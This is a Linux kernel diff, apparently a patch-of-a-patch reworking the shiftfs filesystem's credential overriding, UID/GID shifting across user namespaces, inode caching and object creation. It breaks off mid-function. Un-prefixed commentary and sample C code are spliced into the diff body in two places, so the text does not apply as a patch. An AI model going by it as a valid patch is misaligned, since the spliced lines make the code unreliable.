--	cred->user_ns = get_user_ns(ssi->userns);
-+	put_cred(override_creds(*newcred));
-+	return 0;
-+}
- 
--	return cred;
-+static kuid_t shift_kuid(struct user_namespace *from, struct user_namespace *to,
-+			 kuid_t kuid)
-+{
-+	uid_t uid = from_kuid(from, kuid);
-+	return make_kuid(to, uid);
- }
- 
--static const struct cred *shiftfs_new_creds(const struct cred **newcred,
--					    struct super_block *sb)
-+static kgid_t shift_kgid(struct user_namespace *from, struct user_namespace *to,
-+			 kgid_t kgid)
- {
--	const struct cred *cred = shiftfs_get_up_creds(sb);
-+	gid_t gid = from_kgid(from, kgid);
-+	return make_kgid(to, gid);
-+}
- 
--	*newcred = cred;
-+static void shiftfs_copyattr(struct inode *from, struct inode *to)
-+{
-+	struct user_namespace *from_ns = from->i_sb->s_user_ns;
-+	struct user_namespace *to_ns = to->i_sb->s_user_ns;
-+
-+	to->i_uid = shift_kuid(from_ns, to_ns, from->i_uid);
-+	to->i_gid = shift_kgid(from_ns, to_ns, from->i_gid);
-+	to->i_mode = from->i_mode;
-+	to->i_atime = from->i_atime;
-+	to->i_mtime = from->i_mtime;
-+	to->i_ctime = from->i_ctime;
-+	i_size_write(to, i_size_read(from));
-+}
- 
--	if (cred)
--		cred = override_creds(cred);
--	else
--		printk(KERN_ERR "shiftfs: Credential override failed: no memory\n");
-+static void shiftfs_copyflags(struct inode *from, struct inode *to)
-+{
-+	unsigned int mask = S_SYNC | S_IMMUTABLE | S_APPEND | S_NOATIME;
- 
--	return cred;
-+	inode_set_flags(to, from->i_flags & mask, mask);
- }
- 
--static void shiftfs_old_creds(const struct cred *oldcred,
--			      const struct cred **newcred)
-+static void shiftfs_file_accessed(struct file *file)
- {
--	if (!*newcred)
-+	struct inode *upperi, *loweri;
-+
-+	if (file->f_flags & O_NOATIME)
- 		return;
- 
--	revert_creds(oldcred);
--	put_cred(*newcred);
-+	upperi = file_inode(file);
-+	loweri = upperi->i_private;
-+
-+	if (!loweri)
-+		return;
-+
-+	upperi->i_mtime = loweri->i_mtime;
-+	upperi->i_ctime = loweri->i_ctime;
-+
-+	touch_atime(&file->f_path);
- }
- 
--static int shiftfs_parse_options(struct shiftfs_super_info *ssi, char *options)
-+static int shiftfs_parse_mount_options(struct shiftfs_super_info *sbinfo,
-+				       char *options)
- {
- 	char *p;
- 	substring_t args[MAX_OPT_ARGS];
- 
--	ssi->mark = false;
-+	sbinfo->mark = false;
-+	sbinfo->passthrough = 0;
- 
- 	while ((p = strsep(&options, ",")) != NULL) {
--		int token;
-+		int err, intarg, token;
- 
- 		if (!*p)
- 			continue;
-@@ -91,121 +188,140 @@ static int shiftfs_parse_options(struct shiftfs_super_info *ssi, char *options)
- 		token = match_token(p, tokens, args);
- 		switch (token) {
- 		case OPT_MARK:
--			ssi->mark = true;
-+			sbinfo->mark = true;
-+			break;
-+		case OPT_PASSTHROUGH:
-+			err = match_int(&args[0], &intarg);
-+			if (err)
-+				return err;
-+
-+			if (intarg & ~SHIFTFS_PASSTHROUGH_ALL)
-+				return -EINVAL;
-+
-+			sbinfo->passthrough = intarg;
- 			break;
- 		default:
- 			return -EINVAL;
- 		}
- 	}
-+
- 	return 0;
- }
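A minimal usage sketch of the options parsed above (the paths, the two-step mark/shift split, and the passthrough value are illustrative assumptions, not mandated by the patch):

	#include <sys/mount.h>

	/* Step one is done by real root: mark the tree for shifting.
	 * Step two is done by the user-namespace admin: mount the
	 * shifted view on top of the mark mount.
	 */
	int shiftfs_mount_sketch(void)
	{
		if (mount("/data", "/data", "shiftfs", 0,
			  "mark,passthrough=1") < 0)
			return -1;
		return mount("/data", "/mnt/shifted", "shiftfs", 0,
			     "passthrough=1");
	}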
- 
- static void shiftfs_d_release(struct dentry *dentry)
- {
--	struct dentry *real = dentry->d_fsdata;
-+	struct dentry *lowerd = dentry->d_fsdata;
- 
--	dput(real);
-+	if (lowerd)
-+		dput(lowerd);
- }
- 
- static struct dentry *shiftfs_d_real(struct dentry *dentry,
- 				     const struct inode *inode)
- {
--	struct dentry *real = dentry->d_fsdata;
-+	struct dentry *lowerd = dentry->d_fsdata;
-+
-+	if (inode && d_inode(dentry) == inode)
-+		return dentry;
- 
--	if (unlikely(real->d_flags & DCACHE_OP_REAL))
--		return real->d_op->d_real(real, real->d_inode);
-+	lowerd = d_real(lowerd, inode);
-+	if (lowerd && (!inode || inode == d_inode(lowerd)))
-+		return lowerd;
- 
--	return real;
-+	WARN(1, "shiftfs_d_real(%pd4, %s:%lu): real dentry not found\n", dentry,
-+	     inode ? inode->i_sb->s_id : "NULL", inode ? inode->i_ino : 0);
-+	return dentry;
- }
- 
- static int shiftfs_d_weak_revalidate(struct dentry *dentry, unsigned int flags)
- {
--	struct dentry *real = dentry->d_fsdata;
-+	int err = 1;
-+	struct dentry *lowerd = dentry->d_fsdata;
- 
--	if (d_unhashed(real))
-+	if (d_is_negative(lowerd) != d_is_negative(dentry))
- 		return 0;
- 
--	if (!(real->d_flags & DCACHE_OP_WEAK_REVALIDATE))
--		return 1;
-+	if ((lowerd->d_flags & DCACHE_OP_WEAK_REVALIDATE))
-+		err = lowerd->d_op->d_weak_revalidate(lowerd, flags);
- 
--	return real->d_op->d_weak_revalidate(real, flags);
-+	if (d_really_is_positive(dentry)) {
-+		struct inode *inode = d_inode(dentry);
-+		struct inode *loweri = d_inode(lowerd);
-+
-+		shiftfs_copyattr(loweri, inode);
-+		if (!inode->i_nlink)
-+			err = 0;
-+	}
-+
-+	return err;
- }
- 
- static int shiftfs_d_revalidate(struct dentry *dentry, unsigned int flags)
- {
--	struct dentry *real = dentry->d_fsdata;
--	int ret;
-+	int err = 1;
-+	struct dentry *lowerd = dentry->d_fsdata;
- 
--	if (d_unhashed(real))
-+	if (d_unhashed(lowerd) ||
-+	    ((d_is_negative(lowerd) != d_is_negative(dentry))))
- 		return 0;
- 
--	/*
--	 * inode state of underlying changed from positive to negative
--	 * or vice versa; force a lookup to update our view
--	 */
--	if (d_is_negative(real) != d_is_negative(dentry))
--		return 0;
-+	if (flags & LOOKUP_RCU)
-+		return -ECHILD;
- 
--	if (!(real->d_flags & DCACHE_OP_REVALIDATE))
--		return 1;
-+	if ((lowerd->d_flags & DCACHE_OP_REVALIDATE))
-+		err = lowerd->d_op->d_revalidate(lowerd, flags);
- 
--	ret = real->d_op->d_revalidate(real, flags);
-+	if (d_really_is_positive(dentry)) {
-+		struct inode *inode = d_inode(dentry);
-+		struct inode *loweri = d_inode(lowerd);
- 
--	if (ret == 0 && !(flags & LOOKUP_RCU))
--		d_invalidate(real);
-+		shiftfs_copyattr(loweri, inode);
-+		if (!inode->i_nlink)
-+			err = 0;
-+	}
- 
--	return ret;
-+	return err;
- }
- 
- static const struct dentry_operations shiftfs_dentry_ops = {
--	.d_release	= shiftfs_d_release,
--	.d_real		= shiftfs_d_real,
--	.d_revalidate	= shiftfs_d_revalidate,
-+	.d_release	   = shiftfs_d_release,
-+	.d_real		   = shiftfs_d_real,
-+	.d_revalidate	   = shiftfs_d_revalidate,
- 	.d_weak_revalidate = shiftfs_d_weak_revalidate,
- };
- 
--static int shiftfs_readlink(struct dentry *dentry, char __user *data,
--			    int flags)
--{
--	struct dentry *real = dentry->d_fsdata;
--	const struct inode_operations *iop = real->d_inode->i_op;
--
--	if (iop->readlink)
--		return iop->readlink(real, data, flags);
--
--	return -EINVAL;
--}
--
- static const char *shiftfs_get_link(struct dentry *dentry, struct inode *inode,
- 				    struct delayed_call *done)
- {
--	if (dentry) {
--		struct dentry *real = dentry->d_fsdata;
--		struct inode *reali = real->d_inode;
--		const struct inode_operations *iop = reali->i_op;
--		const char *res = ERR_PTR(-EPERM);
--
--		if (iop->get_link)
--			res = iop->get_link(real, reali, done);
-+	const char *p;
-+	const struct cred *oldcred;
-+	struct dentry *lowerd;
- 
--		return res;
--	} else {
--		/* RCU lookup not supported */
-+	/* RCU lookup not supported */
-+	if (!dentry)
- 		return ERR_PTR(-ECHILD);
--	}
-+
-+	lowerd = dentry->d_fsdata;
-+	oldcred = shiftfs_override_creds(dentry->d_sb);
-+	p = vfs_get_link(lowerd, done);
-+	revert_creds(oldcred);
-+
-+	return p;
- }
- 
- static int shiftfs_setxattr(struct dentry *dentry, struct inode *inode,
- 			    const char *name, const void *value,
- 			    size_t size, int flags)
- {
--	struct dentry *real = dentry->d_fsdata;
--	int err = -EOPNOTSUPP;
--	const struct cred *oldcred, *newcred;
-+	struct dentry *lowerd = dentry->d_fsdata;
-+	int err;
-+	const struct cred *oldcred;
-+
-+	oldcred = shiftfs_override_creds(dentry->d_sb);
-+	err = vfs_setxattr(lowerd, name, value, size, flags);
-+	revert_creds(oldcred);
- 
--	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
--	err = vfs_setxattr(real, name, value, size, flags);
--	shiftfs_old_creds(oldcred, &newcred);
-+	shiftfs_copyattr(lowerd->d_inode, inode);
- 
- 	return err;
- }
-@@ -214,13 +330,13 @@ static int shiftfs_xattr_get(const struct xattr_handler *handler,
- 			     struct dentry *dentry, struct inode *inode,
- 			     const char *name, void *value, size_t size)
- {
--	struct dentry *real = dentry->d_fsdata;
-+	struct dentry *lowerd = dentry->d_fsdata;
- 	int err;
--	const struct cred *oldcred, *newcred;
-+	const struct cred *oldcred;
- 
--	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
--	err = vfs_getxattr(real, name, value, size);
--	shiftfs_old_creds(oldcred, &newcred);
-+	oldcred = shiftfs_override_creds(dentry->d_sb);
-+	err = vfs_getxattr(lowerd, name, value, size);
-+	revert_creds(oldcred);
- 
- 	return err;
- }
-@@ -228,26 +344,29 @@ static int shiftfs_xattr_get(const struct xattr_handler *handler,
- static ssize_t shiftfs_listxattr(struct dentry *dentry, char *list,
- 				 size_t size)
- {
--	struct dentry *real = dentry->d_fsdata;
-+	struct dentry *lowerd = dentry->d_fsdata;
- 	int err;
--	const struct cred *oldcred, *newcred;
-+	const struct cred *oldcred;
- 
--	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
--	err = vfs_listxattr(real, list, size);
--	shiftfs_old_creds(oldcred, &newcred);
-+	oldcred = shiftfs_override_creds(dentry->d_sb);
-+	err = vfs_listxattr(lowerd, list, size);
-+	revert_creds(oldcred);
- 
- 	return err;
- }
- 
- static int shiftfs_removexattr(struct dentry *dentry, const char *name)
- {
--	struct dentry *real = dentry->d_fsdata;
-+	struct dentry *lowerd = dentry->d_fsdata;
- 	int err;
--	const struct cred *oldcred, *newcred;
-+	const struct cred *oldcred;
-+
-+	oldcred = shiftfs_override_creds(dentry->d_sb);
-+	err = vfs_removexattr(lowerd, name);
-+	revert_creds(oldcred);
- 
--	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
--	err = vfs_removexattr(real, name);
--	shiftfs_old_creds(oldcred, &newcred);
-+	/* update c/mtime */
-+	shiftfs_copyattr(lowerd->d_inode, d_inode(dentry));
- 
- 	return err;
- }
-@@ -262,93 +381,157 @@ static int shiftfs_xattr_set(const struct xattr_handler *handler,
- 	return shiftfs_setxattr(dentry, inode, name, value, size, flags);
- }
- 
--static void shiftfs_fill_inode(struct inode *inode, struct dentry *dentry)
-+static int shiftfs_inode_test(struct inode *inode, void *data)
- {
--	struct inode *reali;
--
--	if (!dentry)
--		return;
--
--	reali = dentry->d_inode;
--
--	if (!reali->i_op->get_link)
--		inode->i_opflags |= IOP_NOFOLLOW;
-+	return inode->i_private == data;
-+}
- 
--	inode->i_mapping = reali->i_mapping;
--	inode->i_private = dentry;
-+static int shiftfs_inode_set(struct inode *inode, void *data)
-+{
-+	inode->i_private = data;
-+	return 0;
- }
- 
--static int shiftfs_make_object(struct inode *dir, struct dentry *dentry,
--			       umode_t mode, const char *symlink,
--			       struct dentry *hardlink, bool excl)
-+static int shiftfs_create_object(struct inode *diri, struct dentry *dentry,
-+				 umode_t mode, const char *symlink,
-+				 struct dentry *hardlink, bool excl)
- {
--	struct dentry *real = dir->i_private, *new = dentry->d_fsdata;
--	struct inode *reali = real->d_inode, *newi;
--	const struct inode_operations *iop = reali->i_op;
- 	int err;
--	const struct cred *oldcred, *newcred;
--	bool op_ok = false;
-+	const struct cred *oldcred;
-+	struct cred *newcred;
-+	void *loweri_iop_ptr = NULL;
-+	umode_t modei = mode;
-+	struct super_block *dir_sb = diri->i_sb;
-+	struct dentry *lowerd_new = dentry->d_fsdata;
-+	struct inode *inode = NULL, *loweri_dir = diri->i_private;
-+	const struct inode_operations *loweri_dir_iop = loweri_dir->i_op;
-+	struct dentry *lowerd_link = NULL;
- 
- 	if (hardlink) {
--		op_ok = iop->link;
-+		loweri_iop_ptr = loweri_dir_iop->link;
- 	} else {
- 		switch (mode & S_IFMT) {
- 		case S_IFDIR:
--			op_ok = iop->mkdir;
-+			loweri_iop_ptr = loweri_dir_iop->mkdir;
- 			break;
- 		case S_IFREG:
--			op_ok = iop->create;
-+			loweri_iop_ptr = loweri_dir_iop->create;
- 			break;
- 		case S_IFLNK:
--			op_ok = iop->symlink;
-+			loweri_iop_ptr = loweri_dir_iop->symlink;
-+			break;
-+		case S_IFSOCK:
-+			/* fall through */
-+		case S_IFIFO:
-+			loweri_iop_ptr = loweri_dir_iop->mknod;
-+			break;
- 		}
- 	}
--	if (!op_ok)
--		return -EINVAL;
-+	if (!loweri_iop_ptr) {
-+		err = -EINVAL;
-+		goto out_iput;
-+	}
- 
-+	inode_lock_nested(loweri_dir, I_MUTEX_PARENT);
- 
--	newi = shiftfs_new_inode(dentry->d_sb, mode, NULL);
--	if (!newi)
--		return -ENOMEM;
-+	if (!hardlink) {
-+		inode = new_inode(dir_sb);
-+		if (!inode) {
-+			err = -ENOMEM;
-+			goto out_iput;
-+		}
-+
-+		/*
-+		 * new_inode() will have added the new inode to the super
-+		 * block's list of inodes. Further below we will call
-+		 * inode_insert5(), which would perform the same operation again,
-+		 * thereby corrupting the list. To avoid this, raise I_CREATING
-+		 * in i_state which will cause inode_insert5() to skip this
-+		 * step. I_CREATING will be cleared by d_instantiate_new()
-+		 * below.
-+		 */
-+		spin_lock(&inode->i_lock);
-+		inode->i_state |= I_CREATING;
-+		spin_unlock(&inode->i_lock);
- 
--	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
-+		inode_init_owner(inode, diri, mode);
-+		modei = inode->i_mode;
-+	}
- 
--	inode_lock_nested(reali, I_MUTEX_PARENT);
-+	err = shiftfs_override_object_creds(dentry->d_sb, &oldcred, &newcred,
-+					    dentry, modei, hardlink != NULL);
-+	if (err)
-+		goto out_iput;
- 
--	err = -EINVAL;		/* shut gcc up about uninit var */
- 	if (hardlink) {
--		struct dentry *realhardlink = hardlink->d_fsdata;
--
--		err = vfs_link(realhardlink, reali, new, NULL);
-+		lowerd_link = hardlink->d_fsdata;
-+		err = vfs_link(lowerd_link, loweri_dir, lowerd_new, NULL);
- 	} else {
--		switch (mode & S_IFMT) {
-+		switch (modei & S_IFMT) {
- 		case S_IFDIR:
--			err = vfs_mkdir(reali, new, mode);
-+			err = vfs_mkdir(loweri_dir, lowerd_new, modei);
- 			break;
- 		case S_IFREG:
--			err = vfs_create(reali, new, mode, excl);
-+			err = vfs_create(loweri_dir, lowerd_new, modei, excl);
- 			break;
- 		case S_IFLNK:
--			err = vfs_symlink(reali, new, symlink);
-+			err = vfs_symlink(loweri_dir, lowerd_new, symlink);
-+			break;
-+		case S_IFSOCK:
-+			/* fall through */
-+		case S_IFIFO:
-+			err = vfs_mknod(loweri_dir, lowerd_new, modei, 0);
-+			break;
-+		default:
-+			err = -EINVAL;
-+			break;
- 		}
- 	}
- 
--	shiftfs_old_creds(oldcred, &newcred);
-+	shiftfs_revert_object_creds(oldcred, newcred);
- 
-+	if (!err && WARN_ON(!lowerd_new->d_inode))
-+		err = -EIO;
- 	if (err)
--		goto out_dput;
-+		goto out_iput;
-+
-+	if (hardlink) {
-+		inode = d_inode(hardlink);
-+		ihold(inode);
-+
-+		/* copy up times from lower inode */
-+		shiftfs_copyattr(d_inode(lowerd_link), inode);
-+		set_nlink(d_inode(hardlink), d_inode(lowerd_link)->i_nlink);
-+		d_instantiate(dentry, inode);
-+	} else {
-+		struct inode *inode_tmp;
-+		struct inode *loweri_new = d_inode(lowerd_new);
-+
-+		inode_tmp = inode_insert5(inode, (unsigned long)loweri_new,
-+					  shiftfs_inode_test, shiftfs_inode_set,
-+					  loweri_new);
-+		if (unlikely(inode_tmp != inode)) {
-+			pr_err_ratelimited("shiftfs: newly created inode found in cache\n");
-+			iput(inode_tmp);
-+			err = -EINVAL;
-+			goto out_iput;
-+		}
- 
--	shiftfs_fill_inode(newi, new);
-+		ihold(loweri_new);
-+		shiftfs_fill_inode(inode, loweri_new->i_ino, loweri_new->i_mode,
-+				   0, lowerd_new);
-+		d_instantiate_new(dentry, inode);
-+	}
- 
--	d_instantiate(dentry, newi);
-+	shiftfs_copyattr(loweri_dir, diri);
-+	if (loweri_iop_ptr == loweri_dir_iop->mkdir)
-+		set_nlink(diri, loweri_dir->i_nlink);
- 
--	new = NULL;
--	newi = NULL;
-+	inode = NULL;
- 
-- out_dput:
--	dput(new);
--	iput(newi);
--	inode_unlock(reali);
-+out_iput:
-+	iput(inode);
-+	inode_unlock(loweri_dir);
- 
- 	return err;
- }
-@@ -358,7 +541,7 @@ static int shiftfs_create(struct inode *dir, struct dentry *dentry,
- {
- 	mode |= S_IFREG;
- 
--	return shiftfs_make_object(dir, dentry, mode, NULL, NULL, excl);
-+	return shiftfs_create_object(dir, dentry, mode, NULL, NULL, excl);
- }
- 
- static int shiftfs_mkdir(struct inode *dir, struct dentry *dentry,
-@@ -366,39 +549,52 @@ static int shiftfs_mkdir(struct inode *dir, struct dentry *dentry,
- {
- 	mode |= S_IFDIR;
- 
--	return shiftfs_make_object(dir, dentry, mode, NULL, NULL, false);
-+	return shiftfs_create_object(dir, dentry, mode, NULL, NULL, false);
- }
- 
- static int shiftfs_link(struct dentry *hardlink, struct inode *dir,
- 			struct dentry *dentry)
- {
--	return shiftfs_make_object(dir, dentry, 0, NULL, hardlink, false);
-+	return shiftfs_create_object(dir, dentry, 0, NULL, hardlink, false);
-+}
-+
-+static int shiftfs_mknod(struct inode *dir, struct dentry *dentry, umode_t mode,
-+			 dev_t rdev)
-+{
-+	if (!S_ISFIFO(mode) && !S_ISSOCK(mode))
-+		return -EPERM;
-+
-+	return shiftfs_create_object(dir, dentry, mode, NULL, NULL, false);
- }
- 
- static int shiftfs_symlink(struct inode *dir, struct dentry *dentry,
- 			   const char *symlink)
- {
--	return shiftfs_make_object(dir, dentry, S_IFLNK, symlink, NULL, false);
-+	return shiftfs_create_object(dir, dentry, S_IFLNK, symlink, NULL, false);
- }
- 
- static int shiftfs_rm(struct inode *dir, struct dentry *dentry, bool rmdir)
- {
--	struct dentry *real = dir->i_private, *new = dentry->d_fsdata;
--	struct inode *reali = real->d_inode;
-+	struct dentry *lowerd = dentry->d_fsdata;
-+	struct inode *loweri = dir->i_private;
- 	int err;
--	const struct cred *oldcred, *newcred;
--
--	inode_lock_nested(reali, I_MUTEX_PARENT);
--
--	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
-+	const struct cred *oldcred;
- 
-+	oldcred = shiftfs_override_creds(dentry->d_sb);
-+	inode_lock_nested(loweri, I_MUTEX_PARENT);
- 	if (rmdir)
--		err = vfs_rmdir(reali, new);
-+		err = vfs_rmdir(loweri, lowerd);
- 	else
--		err = vfs_unlink(reali, new, NULL);
-+		err = vfs_unlink(loweri, lowerd, NULL);
-+	inode_unlock(loweri);
-+	revert_creds(oldcred);
- 
--	shiftfs_old_creds(oldcred, &newcred);
--	inode_unlock(reali);
-+	shiftfs_copyattr(loweri, dir);
-+	set_nlink(d_inode(dentry), loweri->i_nlink);
-+	if (!err)
-+		d_drop(dentry);
-+
-+	set_nlink(dir, loweri->i_nlink);
- 
- 	return err;
- }
-@@ -417,27 +613,30 @@ static int shiftfs_rename(struct inode *olddir, struct dentry *old,
- 			  struct inode *newdir, struct dentry *new,
- 			  unsigned int flags)
- {
--	struct dentry *rodd = olddir->i_private, *rndd = newdir->i_private,
--		*realold = old->d_fsdata,
--		*realnew = new->d_fsdata, *trap;
--	struct inode *realolddir = rodd->d_inode, *realnewdir = rndd->d_inode;
-+	struct dentry *lowerd_dir_old = old->d_parent->d_fsdata,
-+		      *lowerd_dir_new = new->d_parent->d_fsdata,
-+		      *lowerd_old = old->d_fsdata, *lowerd_new = new->d_fsdata,
-+		      *trapd;
-+	struct inode *loweri_dir_old = lowerd_dir_old->d_inode,
-+		     *loweri_dir_new = lowerd_dir_new->d_inode;
- 	int err = -EINVAL;
--	const struct cred *oldcred, *newcred;
-+	const struct cred *oldcred;
- 
--	trap = lock_rename(rndd, rodd);
-+	trapd = lock_rename(lowerd_dir_new, lowerd_dir_old);
- 
--	if (trap == realold || trap == realnew)
-+	if (trapd == lowerd_old || trapd == lowerd_new)
- 		goto out_unlock;
- 
--	oldcred = shiftfs_new_creds(&newcred, old->d_sb);
--
--	err = vfs_rename(realolddir, realold, realnewdir,
--			 realnew, NULL, flags);
-+	oldcred = shiftfs_override_creds(old->d_sb);
-+	err = vfs_rename(loweri_dir_old, lowerd_old, loweri_dir_new, lowerd_new,
-+			 NULL, flags);
-+	revert_creds(oldcred);
- 
--	shiftfs_old_creds(oldcred, &newcred);
-+	shiftfs_copyattr(loweri_dir_old, olddir);
-+	shiftfs_copyattr(loweri_dir_new, newdir);
- 
-- out_unlock:
--	unlock_rename(rndd, rodd);
-+out_unlock:
-+	unlock_rename(lowerd_dir_new, lowerd_dir_old);
- 
- 	return err;
- }
-@@ -445,304 +644,1210 @@ static int shiftfs_rename(struct inode *olddir, struct dentry *old,
- static struct dentry *shiftfs_lookup(struct inode *dir, struct dentry *dentry,
- 				     unsigned int flags)
- {
--	struct dentry *real = dir->i_private, *new;
--	struct inode *reali = real->d_inode, *newi;
--	const struct cred *oldcred, *newcred;
--
--	inode_lock(reali);
--	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
--	new = lookup_one_len(dentry->d_name.name, real, dentry->d_name.len);
--	shiftfs_old_creds(oldcred, &newcred);
--	inode_unlock(reali);
-+	struct dentry *new;
-+	struct inode *newi;
-+	const struct cred *oldcred;
-+	struct dentry *lowerd = dentry->d_parent->d_fsdata;
-+	struct inode *inode = NULL, *loweri = lowerd->d_inode;
-+
-+	inode_lock(loweri);
-+	oldcred = shiftfs_override_creds(dentry->d_sb);
-+	new = lookup_one_len(dentry->d_name.name, lowerd, dentry->d_name.len);
-+	revert_creds(oldcred);
-+	inode_unlock(loweri);
- 
- 	if (IS_ERR(new))
- 		return new;
- 
- 	dentry->d_fsdata = new;
- 
--	newi = NULL;
--	if (!new->d_inode)
-+	newi = new->d_inode;
-+	if (!newi)
- 		goto out;
- 
--	newi = shiftfs_new_inode(dentry->d_sb, new->d_inode->i_mode, new);
--	if (!newi) {
-+	inode = iget5_locked(dentry->d_sb, (unsigned long)newi,
-+			     shiftfs_inode_test, shiftfs_inode_set, newi);
-+	if (!inode) {
- 		dput(new);
- 		return ERR_PTR(-ENOMEM);
- 	}
-+	if (inode->i_state & I_NEW) {
-+		/*
-+		 * inode->i_private set by shiftfs_inode_set(), but we still
-+		 * need to take a reference
-+		 */
-+		ihold(newi);
-+		shiftfs_fill_inode(inode, newi->i_ino, newi->i_mode, 0, new);
-+		unlock_new_inode(inode);
-+	}
- 
-- out:
--	return d_splice_alias(newi, dentry);
-+out:
-+	return d_splice_alias(inode, dentry);
- }
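The lookup above keys upper inodes by the address of the lower inode, so repeated lookups of the same lower file share a single shiftfs inode. A condensed sketch of that contract (caller context assumed, error handling elided):

	struct inode *upper = iget5_locked(sb, (unsigned long)loweri,
					   shiftfs_inode_test, /* i_private == loweri? */
					   shiftfs_inode_set,  /* i_private = loweri */
					   loweri);
	if (upper && (upper->i_state & I_NEW)) {
		ihold(loweri); /* i_private holds its own reference */
		shiftfs_fill_inode(upper, loweri->i_ino, loweri->i_mode,
				   0, lowerd);
		unlock_new_inode(upper);
	}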
- 
- static int shiftfs_permission(struct inode *inode, int mask)
- {
--	struct dentry *real = inode->i_private;
--	struct inode *reali = real->d_inode;
--	const struct inode_operations *iop = reali->i_op;
- 	int err;
--	const struct cred *oldcred, *newcred;
-+	const struct cred *oldcred;
-+	struct inode *loweri = inode->i_private;
- 
--	if (mask & MAY_NOT_BLOCK)
-+	if (!loweri) {
-+		WARN_ON(!(mask & MAY_NOT_BLOCK));
- 		return -ECHILD;
-+	}
- 
--	oldcred = shiftfs_new_creds(&newcred, inode->i_sb);
--	if (iop->permission)
--		err = iop->permission(reali, mask);
--	else
--		err = generic_permission(reali, mask);
--	shiftfs_old_creds(oldcred, &newcred);
-+	err = generic_permission(inode, mask);
-+	if (err)
-+		return err;
-+
-+	oldcred = shiftfs_override_creds(inode->i_sb);
-+	err = inode_permission(loweri, mask);
-+	revert_creds(oldcred);
-+
-+	return err;
-+}
-+
-+static int shiftfs_fiemap(struct inode *inode,
-+			  struct fiemap_extent_info *fieinfo, u64 start,
-+			  u64 len)
-+{
-+	int err;
-+	const struct cred *oldcred;
-+	struct inode *loweri = inode->i_private;
-+
-+	if (!loweri->i_op->fiemap)
-+		return -EOPNOTSUPP;
-+
-+	oldcred = shiftfs_override_creds(inode->i_sb);
-+	if (fieinfo->fi_flags & FIEMAP_FLAG_SYNC)
-+		filemap_write_and_wait(loweri->i_mapping);
-+	err = loweri->i_op->fiemap(loweri, fieinfo, start, len);
-+	revert_creds(oldcred);
-+
-+	return err;
-+}
-+
-+static int shiftfs_tmpfile(struct inode *dir, struct dentry *dentry,
-+			   umode_t mode)
-+{
-+	int err;
-+	const struct cred *oldcred;
-+	struct dentry *lowerd = dentry->d_fsdata;
-+	struct inode *loweri = dir->i_private;
-+
-+	if (!loweri->i_op->tmpfile)
-+		return -EOPNOTSUPP;
-+
-+	oldcred = shiftfs_override_creds(dir->i_sb);
-+	err = loweri->i_op->tmpfile(loweri, lowerd, mode);
-+	revert_creds(oldcred);
- 
- 	return err;
- }
- 
- static int shiftfs_setattr(struct dentry *dentry, struct iattr *attr)
- {
--	struct dentry *real = dentry->d_fsdata;
--	struct inode *reali = real->d_inode;
--	const struct inode_operations *iop = reali->i_op;
-+	struct dentry *lowerd = dentry->d_fsdata;
-+	struct inode *loweri = lowerd->d_inode;
- 	struct iattr newattr = *attr;
--	const struct cred *oldcred, *newcred;
-+	const struct cred *oldcred;
- 	struct super_block *sb = dentry->d_sb;
- 	int err;
- 
-+	err = setattr_prepare(dentry, attr);
-+	if (err)
-+		return err;
-+
- 	newattr.ia_uid = KUIDT_INIT(from_kuid(sb->s_user_ns, attr->ia_uid));
- 	newattr.ia_gid = KGIDT_INIT(from_kgid(sb->s_user_ns, attr->ia_gid));
- 
--	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
--	inode_lock(reali);
--	if (iop->setattr)
--		err = iop->setattr(real, &newattr);
--	else
--		err = simple_setattr(real, &newattr);
--	inode_unlock(reali);
--	shiftfs_old_creds(oldcred, &newcred);
-+	inode_lock(loweri);
-+	oldcred = shiftfs_override_creds(dentry->d_sb);
-+	err = notify_change(lowerd, attr, NULL);
-+	revert_creds(oldcred);
-+	inode_unlock(loweri);
- 
--	if (err)
--		return err;
-+	shiftfs_copyattr(loweri, d_inode(dentry));
- 
--	/* all OK, reflect the change on our inode */
--	setattr_copy(d_inode(dentry), attr);
--	return 0;
-+	return err;
- }
- 
- static int shiftfs_getattr(const struct path *path, struct kstat *stat,
- 			   u32 request_mask, unsigned int query_flags)
- {
- 	struct inode *inode = path->dentry->d_inode;
--	struct dentry *real = path->dentry->d_fsdata;
--	struct inode *reali = real->d_inode;
--	const struct inode_operations *iop = reali->i_op;
--	struct path newpath = { .mnt = path->dentry->d_sb->s_fs_info, .dentry = real };
--	int err = 0;
--
--	if (iop->getattr)
--		err = iop->getattr(&newpath, stat, request_mask, query_flags);
--	else
--		generic_fillattr(reali, stat);
-+	struct dentry *lowerd = path->dentry->d_fsdata;
-+	struct inode *loweri = lowerd->d_inode;
-+	struct shiftfs_super_info *info = path->dentry->d_sb->s_fs_info;
-+	struct path newpath = { .mnt = info->mnt, .dentry = lowerd };
-+	struct user_namespace *from_ns = loweri->i_sb->s_user_ns;
-+	struct user_namespace *to_ns = inode->i_sb->s_user_ns;
-+	const struct cred *oldcred;
-+	int err;
-+
-+	oldcred = shiftfs_override_creds(inode->i_sb);
-+	err = vfs_getattr(&newpath, stat, request_mask, query_flags);
-+	revert_creds(oldcred);
- 
- 	if (err)
- 		return err;
- 
- 	/* transform the underlying id */
--	stat->uid = make_kuid(inode->i_sb->s_user_ns, __kuid_val(stat->uid));
--	stat->gid = make_kgid(inode->i_sb->s_user_ns, __kgid_val(stat->gid));
-+	stat->uid = shift_kuid(from_ns, to_ns, stat->uid);
-+	stat->gid = shift_kgid(from_ns, to_ns, stat->gid);
- 	return 0;
- }
- 
--static const struct inode_operations shiftfs_inode_ops = {
--	.lookup		= shiftfs_lookup,
--	.getattr	= shiftfs_getattr,
--	.setattr	= shiftfs_setattr,
--	.permission	= shiftfs_permission,
--	.mkdir		= shiftfs_mkdir,
--	.symlink	= shiftfs_symlink,
--	.get_link	= shiftfs_get_link,
--	.readlink	= shiftfs_readlink,
--	.unlink		= shiftfs_unlink,
--	.rmdir		= shiftfs_rmdir,
--	.rename		= shiftfs_rename,
--	.link		= shiftfs_link,
--	.create		= shiftfs_create,
--	.mknod		= NULL,	/* no special files currently */
--	.listxattr	= shiftfs_listxattr,
--};
-+#ifdef CONFIG_SHIFT_FS_POSIX_ACL
- 
--static struct inode *shiftfs_new_inode(struct super_block *sb, umode_t mode,
--				       struct dentry *dentry)
-+static int
